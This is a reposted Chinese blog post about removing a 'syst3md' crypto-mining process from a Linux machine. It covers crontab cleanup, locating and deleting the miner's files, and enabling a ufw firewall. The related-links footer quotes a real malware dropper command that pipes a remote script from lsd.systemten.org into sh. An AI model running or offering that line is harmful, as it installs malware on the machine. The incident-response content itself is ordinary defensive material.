碼上快樂

相關內容    簡體    繁體

查殺挖礦病毒syst3md

本文轉載自   查看原文   2021-10-13 11:20   1515 

md,我說的的電腦風扇怎么轉個不停,原來有人給我的電腦注入了挖礦病毒,cnm!挖礦4000+

解決方案

  1. su root

    我的root密碼還完了,太難受了,進入到recovery模式,把密碼給清除了一次

  2. top查看cpu占用

    枯了,有個叫 syst3md的進程,占用了300%的cpu,合理懷疑這個就是病毒。

  3. 查看定時任務

crontab -l
corntab -r #刪除所有定時任務
  1. 通過syst3md的進程號33597查找其運行位置
ll /proc/33597
  1. 刪除病毒文件

查到病毒文件位於/usr/game/.man 下面

rm -r /usr/game/.man
設置防火牆

這件事給了我慘痛的教訓,要開啟防火牆不然病毒無孔不入。

ufw enable
ufw default deny incoming #默認阻止incoming
ufw allow ssh #允許ssh
ufw allow 22
ufw status verbose

參考:簡明教程|Linux中UFW的使用 - 小蘑菇糖糖的文章 - 知乎 https://zhuanlan.zhihu.com/p/98880088


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 Virus:病毒查殺 Linux病毒查殺 Linux服務器感染kerberods病毒 | 挖礦病毒查殺及分析 | (curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh) Windows下的挖礦木馬查殺 Ramnit蠕蟲病毒分析和查殺 處理kdevtmpfsi挖礦病毒 挖礦病毒排查 挖礦病毒處理記錄 miner2 挖礦病毒 阿里雲中挖礦病毒
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM